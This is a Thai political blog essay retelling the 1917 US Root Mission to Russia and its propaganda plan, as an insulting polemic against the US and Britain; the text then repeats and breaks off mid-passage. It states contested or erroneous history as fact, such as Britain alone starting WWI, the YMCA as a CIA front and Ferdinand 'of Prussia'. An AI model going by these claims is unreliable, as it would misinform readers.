• เรื่อง สันดาน
    “สันดาน”

    (1)

    ผมหายไปจากหน้าจอหลายวันมาก เพราะขี้เกียจดูข่าวและเขียนถึงไอ้นักล่าตอนนี้ บทมันซ้ำจนน่าเบื่อ แถมสะอิดสะเอียน เวลาดูมันพูด เล่นบทเป็นวีรบุรุษ ผู้เสียสละ จำเป็นต้องรักษาสันติสุขของมนุษยชาติ ฯลฯ ขืนดูต่อ ยาแก้คลื่นไส้ก็เอาไม่อยู่ ผมเลยไปค้นหาหนังสือเก่าๆมาอ่านประเทืองปัญญา ดีกว่าดูไอ้นักล่าตอแหล

    ปรากฏว่า อาการผมหนักกว่าคลื่นไส้!

    ผมไปเจอเอกสารเก่า เกือบ 100 ปี “The American and Russian Missions” ปี ค.ศ.1917 เป็นเอกสารของกระทรวงการต่างประเทศ อเมริกัน ที่เรียกว่า Foreign Relations of the United States (FRUS) ทนไม่ไหว ต้องเอามาเล่าสู่กันฟัง ถ้าไม่บอกว่า คนเขียนเอกสาร เขียนเมื่อไหร่ ท่านผู้อ่านอาจนึกว่าเป็นเรื่องในสมัยปัจจุบัน ผ่านมาเกือบ 100 ปี มันก็ยังใช้วิธีเดิมๆ ตามสันดาน…

    ปี ค.ศ.1917 ตามวิชาประวัติศาสตร์สากล สมัยที่ผมยังเรียนหนังสืออยู่ชั้นมัธยม เขาบอกว่า มีการปฏิวัติเกิดขึ้นในรัสเซีย คือการปฏิวัติอันโด่งดังของพวกบอลเชวิก (Bolsheviks) ที่โค่นพระเจ้าซาร์นิโคลัส ที่ 2 นั่นแหละ

    แต่ความจริง ในปี ค.ศ.1917 รัสเซีย มีการปฏิวัติ 2 ครั้ง ครั้งแรก ในเดือนมีนาคม ผู้นำการปฏิวัติ คือ นาย Aleksandr Kerensky ซึ่งยึดอำนาจจากพระเจ้าซาร์ ทำให้พระเจ้าซาร์ประกาศสละบัลลังก์ แต่ต่อมาพวกปฏิวัติก็จับท่านและราชวงค์ไปกักขัง ส่วนพวก Bolsheviks มาทำการปฏิวัติซ้ำในพฤศจิกายน ค.ศ.1917 ไล่คณะ นาย Kerensky ออกไป แล้วพวก Bolsheviks ก็ปกครองรัสเซียต่อ

    ในตอนที่ นาย Kerensky ทำการปฏิวัตินั้น สงครามโลกครั้งที่ 1 ที่เริ่มขึ้นตั้งแต่ ปี ค.ศ.1914 กำลังโซ้ยกันอย่างดุเดือด สงครามโลกครั้งที่ 1 นี้ ความจริงเริ่มมาจากชาวเกาะใหญ่ เท่าปลายนิ้วก้อยของเท้าซ้าย เป็นฝ่ายกระสัน อยากจะทำสงครามนะครับ เพราะอังกฤษหมั่นไส้ ปนปอดแหกว่า เยอรมันกำลังจะโตใหญ่เกินหน้า ส่วนเรื่องอาชดยุกค์เฟอร์ดินานด์ แห่งปรัสเซียถูกยิง นั่นมันสาเหตุของสงครามโลก ตามประวัติศาสตร์หลักสูตรกระทรวงศึกษาฯ ลองไปหาประวัติศาสตร์นอกหลักสูตรมาอ่านกันบ้าง จะได้เห็นโลกกว้าง และลึกขึ้น

    ประมาณปี คศ 1899 เยอรมันส้มหล่นใส่ ไปได้สัมปทานจากออตโตมาน ให้สร้างทางรถไฟสาย Berlin Bagdad ยาวประมาณ 2,500 ไมล์ ภาพรางรถไฟวิ่งยาวจาก Berlin ผ่านไปกลางตะวันออกกลาง ที่เต็มไปด้วยแหล่งน้ำมันไปจนถึง Bagdad เลยไปอีกหน่อย ก็ถึงอ่าวเปอร์เซีย ที่อังกฤษตีตั๋วจองไว้ ภาพนี้มันทำให้ชาวเกาะใหญ่ฯนอนฝันร้าย ที่นอนเปียกชุ่มทุกคืน ตั้งแต่รู้ข่าว ชาวเกาะฯทนไม่ไหว ลุกขึ้นมาวางแผนเตะตัดขาเยอรมัน ด้วยการไปชวนพรรคพวกมาร่วมรายการถล่มนักสร้างราง แต่ถ้ามีแค่พวกขาประจำอย่างฝรั่งเศส อืตาลีร่วม ชาวเกาะไม่แน่ใจว่า จะถีบนักสร้างรางให้ตกรางได้ ชาวเกาะเลยไปหลอกรัสเซีย ถึงจะอยู่ใกลหน่อย แต่ข่าวว่ากองทัพอึด ให้มาร่วมรายการถล่มนักสร้างรางด้วยกัน (รายละเอียดอยู่ในนิทาน เรื่อง “ลูกครึ่ง หรือนก 2 หัว” และ นิทานชุด “เหยื่อ”)

    รัสเซีย จริงๆไม่มีเรื่องชังหน้ากับเยอรมันซักหน่อย แต่พออังกฤษเอาของขวัญมาล่อว่า ถ้าถีบมันตกรางได้ เอาไปเลย อาณาจักรออโตมาน เรายกให้ท่าน ไม่รู้รัสเซียกำลังมึนอะไร เดินหล่นพลั่กลงหลุม ที่ชาวเกาะขุดล่อ ออโตมานก็ไม่ใช่ของชาวเกาะใหญ่ฯ ซะหน่อย เขาเอาของคนอื่นมาล่อ ไปตกลงกับเขาได้ยังไง เนี่ย เหมือนเวลาคนดวงไม่ดี มีดาวประเภท เสาร์ ราหู ทับลัคน์อะไรทำนองนั้น เวลาดาวแรงอย่างนี้ทับลัคน์ อย่าไปเชื่ออะไรใครเขาง่ายๆนะครับ
    เมื่อ นาย Kerensky ทำปฏิวัติรัสเซีย สงครามเล่นไปแล้ว 3 ปี แต่ยังไม่มีทีท่าว่าจะเลิก คนจัดรายการ ออกตั๋วเสริมมาขายเพิ่มอยู่เรื่อย แม้บ้านช่องจะพังพินาศฉิบหายกันเป็นแถบๆ แต่ชาวเกาะก็บอกให้สู้ต่อ ก็บทมันเขียนไว้อย่างนั้น ทีนี้ รัสเซียแนวร่วม ดันมีปฏิวัติ รัฐบาลใหม่จะเล่นสงครามต่อหรือ เปล่า ชาวเกาะชักเหงื่อแตก อเมริกาเด็กเรา (ตอนนั้น ไอ้นักล่ายังเป็นเด็ก อยู่ในอาณัติของอังกฤษ เรื่องมัน 100 ปีมาแล้วนะครับ แต่ผมก็ไม่แน่ใจ ตอนนี้ ถึงไม่ใช่เด็กแล้ว แต่ก็อาจจะยังอยู่ ในอาณัติกันเหมือนเดิม) ก็ดันประกาศอยู่นั่นว่า เราเป็นกลาง (ยัง) ไม่เข้ามาช่วยรบ จำเราต้องใช้มันไปสืบความว่า รัสเซียหลังปฏิวัตินี่ จะสู้ต่อ หรือจะฝ่อหนี

    ประธานาธิบดี Woodlow Wilson ไม้หลักปักเลน จึงจัดคณะละครเร่ ไปเจริญสัมพันธไมตรี ชื่อ The Roots Mission ให้ไปดูลาดเลารัสเซีย หลังปฏิวัติครั้งแรก ว่าหน้าตาเป็นยังไง หล่อเหลา หรือเหลาเหย่ คณะละครเร่เจริญสัมพันธไมตรีที่นำโดย นาย Elihu Roots ซึ่งมีตำแหน่งเป็นอดีตทูต อดีตรัฐมนตรี อดีตอะไรเยอะแยะไปหมด ไปเปิดดูกูเกิลเอาแล้วกันนะครับ น่าเชื่อถือดี แต่คราวนี้ดูเหมือนจะไปทำหน้าที่เล่นละคร และทำหน้าที่นักสืบมากกว่า

    คณะนาย Roots มีด้วยกันกว่าสิบคน มีทั้ง นักการทูต นักธุรกิจ วิศวกร นักหนังสือพิมพ์ นักกิจกรรมสังคม (YMCA) นายทหารบก นายทหารเรือ เบิ้มๆทั้งนั้น มันเป็นคณะที่ต้องไปแสดงละครจริงๆ พวกเขาไปถึง เมือง Petrograd ของรัสเซีย เดือนพฤษภาคม 1917 ใช้เวลาเจริญสัมพันธไมตรีกับคณะปฏิวัติ Kerensky ประมาณ 4 เดือน ไปมันทั่วรัสเซียอันกว้างใหญ่ไพศาล ไปจนถึงไซบีเรียโน่น ต้องยอมรับว่า คณะนี้เขาเล่นละครเก่ง

    คงสงสัยกัน พวก YMCA ( Young Men’s Christain Association) นี่คณะละคร เอาไปทำอะไร ในสมัยนั้น (และสมัยนี้ ?!) เขาใช้ YMCA ทำหน้าที่เหมือน CIA ในคราบทูตวัฒนธรรม ใช้ศาสนา การกีฬา การบรรเทิง บังหน้า เข้าไปคลุกคลี กับชาวบ้าน ชาวเมือง และนักเรียนนักศึกษา มีทั้ง YMCA และ YWCA ของฝ่ายหญิง การจะเอาเจ้าหน้าที่ หน่วยงานราชการทหาร ไปคลุกกับชาวบ้านนี่ บางทีไม่ได้ผล ชาวบ้านไม่เปิดใจ ก็ใช้กิจกรรมนำโดยกลุ่มแบบนี้ สมัยนี้ ก็คงไม่ใช้ YMCA แล้ว เขามาในรูปแบบของกลุ่มอะไร ลองเดาดู

    (2)

    เดือนสิงหาคม คณะละครเร่ แสดงเสร็จ ก็ทำรายงานยาวเหยียด ส่งให้รัฐมนตรีกระทรวงต่างประเทศ นาย Robert Lansing พิจารณา
    ผมจะขอยกมาเฉพาะบางส่วน ที่น่าสนใจ แต่จะเอาฉบับเต็มลงให้อ่านกันด้วย เผื่อท่านใดอยากจะตั้งคณะละคร จะได้ใช้เป็นตัวอย่าง

    คณะละครได้ไปพบทั้งพวกทำปฏิวัติ ทหารฝ่ายเก่า ฝ่ายใหม่ ชาวบ้าน ชาววัด ครู นักเรียน พ่อค้า นักธุรกิจ สายลับ ฯลฯ พบมันหมด ไปคุย ไปถาม ไปเสือก ก็เหมือนที่ไอ้บ้าอะไรที่เพิ่ง มาเสือกที่บ้านเรา เมื่อต้นเดือนนี้ละครับ มันคงมาจากคณะละครเดียวกัน รูปแบบ การเจรจา ถึงได้ทำนองเดียวกัน เล่นกันแบบนี้มา 100 ปีแล้ว ยังไม่เลิก

    ข้อสรุปที่คณะละคร ได้จากการสำรวจ คือ ชาวรัสเซีย ถอดใจไม่อยากเล่นสงครามแล้ว ขนมปังก็จะไม่มีกิน บ้านก็พัง จนแทบไม่เหลือที่ให้ซุกหัว จะไปรบทำไมอีก คณะละครอ้างว่า เพราะฝ่ายเยอรมันขนสายลับเข้ามา เต็มเมืองรัสเซีย มากรอกหูชาวรัสเซีย และทหารรัสเซียว่า จะไปรบทำไม คนอยากรบน่ะ คือพระเจ้าซาร์ ตอนนี้ท่านก็ไปแล้ว พี่น้องก็ไม่ต้องไปรบแล้ว กลับบ้านไปทำไร่ทำนาต่อแล้วกัน

    ฝ่ายคณะละครได้ยินเข้าก็ลมแทบใส่ นี่ใกล้จะถึงคิวเราเข้าฉากไปรบต่อ ถ้าไม่มีรัสเซียอยู่แถวหน้าตายก่อน พวกเราก็ ฉ. ห. ละซิ เพราะฉนั้น สิ่งที่ฝ่ายเราต้องทำด่วน (ที่เปิดเผยได้) มี 2 เรื่อง

    เรื่องที่ 1 เราต้องเอาทีมอเมริกัน เข้ามาดูแลเรื่องถนนหนทาง รางรถไฟ ในรัสเซีย เพราะขณะนี้ อาวุธยุทธภัณท์ ที่ฝ่ายเราขนมาให้ ยังกองค้างอยูที่เมืองท่า Vladivostok ประมาณ 700,000 ตัน จะขนผ่านข้ามไป Moscow ยังไม่ได้ เพราะทั้งถนน ทั้งทางรถไฟ รับน้ำหนักไม่ไหว แล้วเมื่อเราจะเข้าทำสงคราม ของมันจะต้องขนมาอีกมากมาย เราจะทำยังไง ต้องแก้ไขเรื่องนี้ด่วนจี๋

    อืม คณะละครนี่ ไม่ใช่ย่อย ไม่ใช่มารำเฉิบๆ อย่างเดียว เขาไปสำรวจหมด ระยะทางรถไฟจาก Vladivostok ถึง Moscow น่ะ ประมาณ 5 ถึง 6,000 ไมล์ เชียวนะ รำไป สำรวจไปนี่ไม่ใช่งานเล็กๆ

    แล้วจำกันได้ไหมครับ เมื่อเขาจะรบกับเวียตนาม เขาใช้บ้านเราเป็นฐานทัพ แต่ก่อนจะยกโขยงกองทัพกันเข้ามา เขาส่งคณะละครเร่แบบนี้ มาสำรวจบ้านเราไม่รู้กี่คณะ สำรวจอะไรไปบ้างก็ไม่รู้ แล้วเขาก็สร้างถนน จากสระบุรี กว้างขวางยาวเรียบไปถึงโคราช ให้เราชาวบ้านดีใจ แหม อเมริกาใจดีจัง ถนนเลยมีชื่อว่า มิตรภาพ เปล่าหรอกครับ เขาเตรียมไว้ขนส่ง อาวุธ ยุทธภัณท์ ที่เขาจะขนมาทางเรือ แต่กลัวมากองเป็นภูเขา อยู่แถวท่าเรือคลองเตย แบบ Vladivostock! มันก็เลย ต้องสร้างถนน สร้างสนามบิน ให้ประเทศไทย ฯลฯ (รายละเอียดมีอยู่ในนิทานเรื่อง “จิกโก๋ปากซอย” ถ้าอยากอ่านประวัติศาสตร์ นอกหลักสูตร กระทรวงศึกษาฯ)

    เรื่องที่ 2 ที่คณะละคร บอกสำคัญอย่างยิ่ง คือ เราต้องย้อมความคิค ย้อมสมองคนรัสเซียให้ “อยากทำสงคราม” ไม่ให้เชื่อฟังเยอรมัน อเมริกาจะทำได้อย่างไร รัสเซียไม่ใช่สมันน้อยนะ คณะละครบอกไม่มีปัญหา คนรัสเซีย ก็เหมือนเด็ก ที่ตัวโตนั่นแหละ
    เอ้า เจ้าหน้าที่รัสเซียที่ตามอ่านนิทาน ช่วยขีดเส้นใต้ 2 เส้น แล้วรายงานส่งคุณพี่ปูตินของผมด้วยนะครับ ว่าอเมริกาพูดแบบนี้ แปลว่าเห็นคนรัสเซียเป็นยังไง (เสี้ยม ซะหน่อย)

    คณะละครเร่ เขียนแผนการฟอกย้อมให้เสร็จ เขาระบุว่า เป้าหมายของแผนคือ:

    “To influence the attitude of the people of Russia for the prosecution of war as the only way of perpetuating their democracy ”

    ใครแปลเก่งๆ ลองแปลดูครับ

    สำหรับผม ผมเข้าใจความว่า เพื่อเป็นการย้อมความคิดของคนรัสเซีย ให้เชื่อว่า การเข้าทำสงคราม เป็นทางเดียวที่จะทำให้ประชาธิปไตยของเขาอยู่อย่างยั่งยืน

    ผมเขียนปูพื้น เล่ามาเสียยืดยาว เพื่อจะให้อ่านประโยคนี้กัน อ่านแล้วโปรดพิเคราะห์กันให้ดีๆ จะได้เห็น “สันดาน” อันอำมหิต ของอเมริกา (และของอังกฤษ) ที่ผ่านมาแล้วเกือบ 100 ปี แล้วก็ยังไม่เปลี่ยน และอีกกี่ร้อยปี ก็คงไม่มีวันเปลี่ยนความอำมหิต นี้ โดยใช้ความตอแหล แบบหน้าด้านๆ อ้างเรื่องประชาธิปไตย แบบตะหวักตะบวย เพื่อประโยชน์ของมัน หรือพวกมันเท่านั้น ใครจะเจ็บ ใครจะตาย ใครจะฉิบหาย ใครจะวิบัติ ขนาดไหน มันไม่สนใจ เลวถึงขนาดนี้ อำมหิต อย่างนี้ ยังมีคนอยากให้อเมริกา ครอบหัวสี่เหลี่ยมต่อไปอีกหรือครับ

    แผนการฟอกย้อม จะใช้วิธีหลักๆ อยู่ 5 อย่าง

    1. จัดกระบวนการ “สร้าง และย้อมข่าว” แล้วกระจายข่าว ที่สร้างและย้อมแล้ว ไปทั่วรัสเซีย โดยจะเอาทีมงานมาจากอเมริกา ทั้งด้านการเขียน และการแปล

    คือเอาช่างชำนาญการย้อมของอเมริกา มาตั้งโรงงานที่รัสเซีย เหมือนที่มีอยู่เกลื่อนในบ้านสมันน้อย ซื้อมันทุกช่อง ครอบมันทุกฉบับ

    2. การใช้เอกสารประเภทแผ่นพับ และใบปลิว เพื่อง่ายแก่การเสพข่าว
    สมัยนี้ก็คงเปลี่ยนเป็น เครื่องมือ ไอ้ป๊อด ไอ้แป้ด ไอ้โฟน โดยเฉพาะ พวกเล่นไลน์นี่เหยื่อชั้นดี ส่งข่าวย้อมอะไรเข้าไปแพลบเดียว กระจายทั่ว เรื่องโกหกทั้งนั้น เสพกันได้แยะและเร็วกว่า

    3. สร้างหนังประเภทต่างๆ เพื่อให้ชาวรัสเซียเสพ เช่น หนังเกี่ยวกับสงคราม หนังชีวิตคนอเมริกันในชนบท ในเมือง หนังเกี่ยวกับการทำอุตสาหกรรม การค้า หนังตลก และที่สำคัญ หนังที่แสดงถึงความรักชาติและการแสวงหาประชาธิปไตย

    ฮอลลีวู้ดรับไป เดี๋ยวนี้ก็ยังเป็นโรงย้อมที่สำคัญหมายเลขหนึ่ง

    4. การโฆษณา ประชาสัมพันธ์ โดยเฉพาะทำเป็นแผ่นโปสเตอร์สีสวยสดุดตา สื่อหัวข้อที่เหมาะสมกับรัสเซีย โดยให้สำนักงานประชาสัมพันธ์ ฝีมือเยี่ยมของอเมริกา

    รู้ไหมครับ พวกประชาสัมพันธ์เก่งๆ เขาย้อมโลกใบนี้มานานเท่าไหร่แล้ว เขาเอาอะไรมาใส่หัวสมันน้อยบ้าง

    5. วิธีการที่แนบเนียนและใช้แพร่หลาย คือการพูด ซึ่งจำเป็นต้องใช้ นักพูด นักประชาสัมพันธ์ และครู เป็นจำนวนมาก โดยอเมริกาอาจจะเลือกอย่างเหมาะสม จากชาวรัสเซียก็ได้ นักพูดและครูนี้ ถือว่าเป็นเครื่องมือย้อมที่เยี่ยมที่สุด

    วิธีการนี้ บ้านสมันน้อยใช้แยะมาก ยิ่งตอนนี้ซึ่งเป็นช่วงสำคัญของบ้านเมือง ช่างย้อมถูกจ้างมาทำหน้าที่เพิ่มขึ้นอีกมาก มาในสาระพัดคราบ หัดสังเกตกันบ้าง ใครของจริง ใครของปลอม ใครช่างย้อมฝีมือเนียน

    เป็นไงครับ 5 วิธีการหลัก ยังอยู่ครบในศตวรรษนี้ แค่เปลี่ยน เสื้อผ้า หน้าผม ถ้อยคำ ท่าทาง ให้เข้ากับสมัย ละครฉากเดิมๆก็ยังใช้ได้ เครื่องมือย้อมก็ยังใช้อยู่ แค่เปลี่ยนรุ่นใหม่ไปเรื่อยๆ เท่านั้น นี่ตกลงเราจะให้เขาเล่นแบบนี้ ไปเรื่อยๆ อีก 100 ปีหรือไงครับ

    สวัสดีครับ
    คนเล่านิทาน
    26 กพ. 2558

    ####################
    เอกสารประกอบ
    FRUS
    https://www.dropbox.com/s/
    เรื่อง สันดาน “สันดาน” (1) ผมหายไปจากหน้าจอหลายวันมาก เพราะขี้เกียจดูข่าวและเขียนถึงไอ้นักล่าตอนนี้ บทมันซ้ำจนน่าเบื่อ แถมสะอิดสะเอียน เวลาดูมันพูด เล่นบทเป็นวีรบุรุษ ผู้เสียสละ จำเป็นต้องรักษาสันติสุขของมนุษยชาติ ฯลฯ ขืนดูต่อ ยาแก้คลื่นไส้ก็เอาไม่อยู่ ผมเลยไปค้นหาหนังสือเก่าๆมาอ่านประเทืองปัญญา ดีกว่าดูไอ้นักล่าตอแหล ปรากฏว่า อาการผมหนักกว่าคลื่นไส้! ผมไปเจอเอกสารเก่า เกือบ 100 ปี “The American and Russian Missions” ปี ค.ศ.1917 เป็นเอกสารของกระทรวงการต่างประเทศ อเมริกัน ที่เรียกว่า Foreign Relations of the United States (FRUS) ทนไม่ไหว ต้องเอามาเล่าสู่กันฟัง ถ้าไม่บอกว่า คนเขียนเอกสาร เขียนเมื่อไหร่ ท่านผู้อ่านอาจนึกว่าเป็นเรื่องในสมัยปัจจุบัน ผ่านมาเกือบ 100 ปี มันก็ยังใช้วิธีเดิมๆ ตามสันดาน… ปี ค.ศ.1917 ตามวิชาประวัติศาสตร์สากล สมัยที่ผมยังเรียนหนังสืออยู่ชั้นมัธยม เขาบอกว่า มีการปฏิวัติเกิดขึ้นในรัสเซีย คือการปฏิวัติอันโด่งดังของพวกบอลเชวิก (Bolsheviks) ที่โค่นพระเจ้าซาร์นิโคลัส ที่ 2 นั่นแหละ แต่ความจริง ในปี ค.ศ.1917 รัสเซีย มีการปฏิวัติ 2 ครั้ง ครั้งแรก ในเดือนมีนาคม ผู้นำการปฏิวัติ คือ นาย Aleksandr Kerensky ซึ่งยึดอำนาจจากพระเจ้าซาร์ ทำให้พระเจ้าซาร์ประกาศสละบัลลังก์ แต่ต่อมาพวกปฏิวัติก็จับท่านและราชวงค์ไปกักขัง ส่วนพวก Bolsheviks มาทำการปฏิวัติซ้ำในพฤศจิกายน ค.ศ.1917 ไล่คณะ นาย Kerensky ออกไป แล้วพวก Bolsheviks ก็ปกครองรัสเซียต่อ ในตอนที่ นาย Kerensky ทำการปฏิวัตินั้น สงครามโลกครั้งที่ 1 ที่เริ่มขึ้นตั้งแต่ ปี ค.ศ.1914 กำลังโซ้ยกันอย่างดุเดือด สงครามโลกครั้งที่ 1 นี้ ความจริงเริ่มมาจากชาวเกาะใหญ่ เท่าปลายนิ้วก้อยของเท้าซ้าย เป็นฝ่ายกระสัน อยากจะทำสงครามนะครับ เพราะอังกฤษหมั่นไส้ ปนปอดแหกว่า เยอรมันกำลังจะโตใหญ่เกินหน้า ส่วนเรื่องอาชดยุกค์เฟอร์ดินานด์ แห่งปรัสเซียถูกยิง นั่นมันสาเหตุของสงครามโลก ตามประวัติศาสตร์หลักสูตรกระทรวงศึกษาฯ ลองไปหาประวัติศาสตร์นอกหลักสูตรมาอ่านกันบ้าง จะได้เห็นโลกกว้าง และลึกขึ้น ประมาณปี คศ 1899 เยอรมันส้มหล่นใส่ ไปได้สัมปทานจากออตโตมาน ให้สร้างทางรถไฟสาย Berlin Bagdad ยาวประมาณ 2,500 ไมล์ ภาพรางรถไฟวิ่งยาวจาก Berlin ผ่านไปกลางตะวันออกกลาง ที่เต็มไปด้วยแหล่งน้ำมันไปจนถึง Bagdad เลยไปอีกหน่อย ก็ถึงอ่าวเปอร์เซีย ที่อังกฤษตีตั๋วจองไว้ ภาพนี้มันทำให้ชาวเกาะใหญ่ฯนอนฝันร้าย ที่นอนเปียกชุ่มทุกคืน ตั้งแต่รู้ข่าว ชาวเกาะฯทนไม่ไหว ลุกขึ้นมาวางแผนเตะตัดขาเยอรมัน ด้วยการไปชวนพรรคพวกมาร่วมรายการถล่มนักสร้างราง แต่ถ้ามีแค่พวกขาประจำอย่างฝรั่งเศส อืตาลีร่วม ชาวเกาะไม่แน่ใจว่า จะถีบนักสร้างรางให้ตกรางได้ ชาวเกาะเลยไปหลอกรัสเซีย ถึงจะอยู่ใกลหน่อย แต่ข่าวว่ากองทัพอึด ให้มาร่วมรายการถล่มนักสร้างรางด้วยกัน (รายละเอียดอยู่ในนิทาน เรื่อง “ลูกครึ่ง หรือนก 2 หัว” และ นิทานชุด “เหยื่อ”) รัสเซีย จริงๆไม่มีเรื่องชังหน้ากับเยอรมันซักหน่อย แต่พออังกฤษเอาของขวัญมาล่อว่า ถ้าถีบมันตกรางได้ เอาไปเลย อาณาจักรออโตมาน เรายกให้ท่าน ไม่รู้รัสเซียกำลังมึนอะไร เดินหล่นพลั่กลงหลุม ที่ชาวเกาะขุดล่อ ออโตมานก็ไม่ใช่ของชาวเกาะใหญ่ฯ ซะหน่อย เขาเอาของคนอื่นมาล่อ ไปตกลงกับเขาได้ยังไง เนี่ย เหมือนเวลาคนดวงไม่ดี มีดาวประเภท เสาร์ ราหู ทับลัคน์อะไรทำนองนั้น เวลาดาวแรงอย่างนี้ทับลัคน์ อย่าไปเชื่ออะไรใครเขาง่ายๆนะครับ เมื่อ นาย Kerensky ทำปฏิวัติรัสเซีย สงครามเล่นไปแล้ว 3 ปี แต่ยังไม่มีทีท่าว่าจะเลิก คนจัดรายการ ออกตั๋วเสริมมาขายเพิ่มอยู่เรื่อย แม้บ้านช่องจะพังพินาศฉิบหายกันเป็นแถบๆ แต่ชาวเกาะก็บอกให้สู้ต่อ ก็บทมันเขียนไว้อย่างนั้น ทีนี้ รัสเซียแนวร่วม ดันมีปฏิวัติ รัฐบาลใหม่จะเล่นสงครามต่อหรือ เปล่า ชาวเกาะชักเหงื่อแตก อเมริกาเด็กเรา (ตอนนั้น ไอ้นักล่ายังเป็นเด็ก อยู่ในอาณัติของอังกฤษ เรื่องมัน 100 ปีมาแล้วนะครับ แต่ผมก็ไม่แน่ใจ ตอนนี้ ถึงไม่ใช่เด็กแล้ว แต่ก็อาจจะยังอยู่ ในอาณัติกันเหมือนเดิม) ก็ดันประกาศอยู่นั่นว่า เราเป็นกลาง (ยัง) ไม่เข้ามาช่วยรบ จำเราต้องใช้มันไปสืบความว่า รัสเซียหลังปฏิวัตินี่ จะสู้ต่อ หรือจะฝ่อหนี ประธานาธิบดี Woodlow Wilson ไม้หลักปักเลน จึงจัดคณะละครเร่ ไปเจริญสัมพันธไมตรี ชื่อ The Roots Mission ให้ไปดูลาดเลารัสเซีย หลังปฏิวัติครั้งแรก ว่าหน้าตาเป็นยังไง หล่อเหลา หรือเหลาเหย่ คณะละครเร่เจริญสัมพันธไมตรีที่นำโดย นาย Elihu Roots ซึ่งมีตำแหน่งเป็นอดีตทูต อดีตรัฐมนตรี อดีตอะไรเยอะแยะไปหมด ไปเปิดดูกูเกิลเอาแล้วกันนะครับ น่าเชื่อถือดี แต่คราวนี้ดูเหมือนจะไปทำหน้าที่เล่นละคร และทำหน้าที่นักสืบมากกว่า คณะนาย Roots มีด้วยกันกว่าสิบคน มีทั้ง นักการทูต นักธุรกิจ วิศวกร นักหนังสือพิมพ์ นักกิจกรรมสังคม (YMCA) นายทหารบก นายทหารเรือ เบิ้มๆทั้งนั้น มันเป็นคณะที่ต้องไปแสดงละครจริงๆ พวกเขาไปถึง เมือง Petrograd ของรัสเซีย เดือนพฤษภาคม 1917 ใช้เวลาเจริญสัมพันธไมตรีกับคณะปฏิวัติ Kerensky ประมาณ 4 เดือน ไปมันทั่วรัสเซียอันกว้างใหญ่ไพศาล ไปจนถึงไซบีเรียโน่น ต้องยอมรับว่า คณะนี้เขาเล่นละครเก่ง คงสงสัยกัน พวก YMCA ( Young Men’s Christain Association) นี่คณะละคร เอาไปทำอะไร ในสมัยนั้น (และสมัยนี้ ?!) เขาใช้ YMCA ทำหน้าที่เหมือน CIA ในคราบทูตวัฒนธรรม ใช้ศาสนา การกีฬา การบรรเทิง บังหน้า เข้าไปคลุกคลี กับชาวบ้าน ชาวเมือง และนักเรียนนักศึกษา มีทั้ง YMCA และ YWCA ของฝ่ายหญิง การจะเอาเจ้าหน้าที่ หน่วยงานราชการทหาร ไปคลุกกับชาวบ้านนี่ บางทีไม่ได้ผล ชาวบ้านไม่เปิดใจ ก็ใช้กิจกรรมนำโดยกลุ่มแบบนี้ สมัยนี้ ก็คงไม่ใช้ YMCA แล้ว เขามาในรูปแบบของกลุ่มอะไร ลองเดาดู (2) เดือนสิงหาคม คณะละครเร่ แสดงเสร็จ ก็ทำรายงานยาวเหยียด ส่งให้รัฐมนตรีกระทรวงต่างประเทศ นาย Robert Lansing พิจารณา ผมจะขอยกมาเฉพาะบางส่วน ที่น่าสนใจ แต่จะเอาฉบับเต็มลงให้อ่านกันด้วย เผื่อท่านใดอยากจะตั้งคณะละคร จะได้ใช้เป็นตัวอย่าง คณะละครได้ไปพบทั้งพวกทำปฏิวัติ ทหารฝ่ายเก่า ฝ่ายใหม่ ชาวบ้าน ชาววัด ครู นักเรียน พ่อค้า นักธุรกิจ สายลับ ฯลฯ พบมันหมด ไปคุย ไปถาม ไปเสือก ก็เหมือนที่ไอ้บ้าอะไรที่เพิ่ง มาเสือกที่บ้านเรา เมื่อต้นเดือนนี้ละครับ มันคงมาจากคณะละครเดียวกัน รูปแบบ การเจรจา ถึงได้ทำนองเดียวกัน เล่นกันแบบนี้มา 100 ปีแล้ว ยังไม่เลิก ข้อสรุปที่คณะละคร ได้จากการสำรวจ คือ ชาวรัสเซีย ถอดใจไม่อยากเล่นสงครามแล้ว ขนมปังก็จะไม่มีกิน บ้านก็พัง จนแทบไม่เหลือที่ให้ซุกหัว จะไปรบทำไมอีก คณะละครอ้างว่า เพราะฝ่ายเยอรมันขนสายลับเข้ามา เต็มเมืองรัสเซีย มากรอกหูชาวรัสเซีย และทหารรัสเซียว่า จะไปรบทำไม คนอยากรบน่ะ คือพระเจ้าซาร์ ตอนนี้ท่านก็ไปแล้ว พี่น้องก็ไม่ต้องไปรบแล้ว กลับบ้านไปทำไร่ทำนาต่อแล้วกัน ฝ่ายคณะละครได้ยินเข้าก็ลมแทบใส่ นี่ใกล้จะถึงคิวเราเข้าฉากไปรบต่อ ถ้าไม่มีรัสเซียอยู่แถวหน้าตายก่อน พวกเราก็ ฉ. ห. ละซิ เพราะฉนั้น สิ่งที่ฝ่ายเราต้องทำด่วน (ที่เปิดเผยได้) มี 2 เรื่อง เรื่องที่ 1 เราต้องเอาทีมอเมริกัน เข้ามาดูแลเรื่องถนนหนทาง รางรถไฟ ในรัสเซีย เพราะขณะนี้ อาวุธยุทธภัณท์ ที่ฝ่ายเราขนมาให้ ยังกองค้างอยูที่เมืองท่า Vladivostok ประมาณ 700,000 ตัน จะขนผ่านข้ามไป Moscow ยังไม่ได้ เพราะทั้งถนน ทั้งทางรถไฟ รับน้ำหนักไม่ไหว แล้วเมื่อเราจะเข้าทำสงคราม ของมันจะต้องขนมาอีกมากมาย เราจะทำยังไง ต้องแก้ไขเรื่องนี้ด่วนจี๋ อืม คณะละครนี่ ไม่ใช่ย่อย ไม่ใช่มารำเฉิบๆ อย่างเดียว เขาไปสำรวจหมด ระยะทางรถไฟจาก Vladivostok ถึง Moscow น่ะ ประมาณ 5 ถึง 6,000 ไมล์ เชียวนะ รำไป สำรวจไปนี่ไม่ใช่งานเล็กๆ แล้วจำกันได้ไหมครับ เมื่อเขาจะรบกับเวียตนาม เขาใช้บ้านเราเป็นฐานทัพ แต่ก่อนจะยกโขยงกองทัพกันเข้ามา เขาส่งคณะละครเร่แบบนี้ มาสำรวจบ้านเราไม่รู้กี่คณะ สำรวจอะไรไปบ้างก็ไม่รู้ แล้วเขาก็สร้างถนน จากสระบุรี กว้างขวางยาวเรียบไปถึงโคราช ให้เราชาวบ้านดีใจ แหม อเมริกาใจดีจัง ถนนเลยมีชื่อว่า มิตรภาพ เปล่าหรอกครับ เขาเตรียมไว้ขนส่ง อาวุธ ยุทธภัณท์ ที่เขาจะขนมาทางเรือ แต่กลัวมากองเป็นภูเขา อยู่แถวท่าเรือคลองเตย แบบ Vladivostock! มันก็เลย ต้องสร้างถนน สร้างสนามบิน ให้ประเทศไทย ฯลฯ 